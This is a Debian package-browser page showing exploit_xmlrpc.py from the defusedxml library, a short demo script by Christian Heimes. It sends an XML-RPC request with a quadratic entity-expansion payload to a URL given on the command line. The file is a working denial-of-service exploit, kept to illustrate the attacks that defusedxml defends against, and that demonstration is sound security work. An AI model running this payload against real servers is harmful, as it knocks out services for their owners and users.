File: exploit_xmlrpc.py

package info (click to toggle)
defusedxml 0.7.1-3
  • links: PTS, VCS
  • area: main
  • in suites: forky, sid, trixie
  • size: 492 kB
  • sloc: python: 1,299; makefile: 48; xml: 46; ruby: 20; perl: 6; php: 5
file content (42 lines) | stat: -rwxr-xr-x 778 bytes parent folder | download | duplicates (3)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#!/usr/bin/python
"""Demo exploit for XML-RPC DoS attack

Author: Christian Heimes
"""
from __future__ import print_function

import sys
import urllib2

if len(sys.argv) != 2:
    sys.exit("{} url".format(sys.argv[0]))

url = sys.argv[1]

xml = """<?xml version='1.0'?>
<!DOCTYPE bomb [
<!ENTITY a "VALUE">
]>
<methodCall>
<methodName>system.methodSignature</methodName>
<params>
<param>
<value><string>QUAD</string></value>
</param>
</params>
</methodCall>
"""

xml = xml.replace("VALUE", "a" * 100000)
xml = xml.replace("QUAD", "&a;" * 1000)

headers = {"Content-Type": "text/xml", "Content-Length": len(xml)}

req = urllib2.Request(url, data=xml, headers=headers)

print("Sending request to {}".format(url))

resp = urllib2.urlopen(req)

print("Response")
print(resp.read())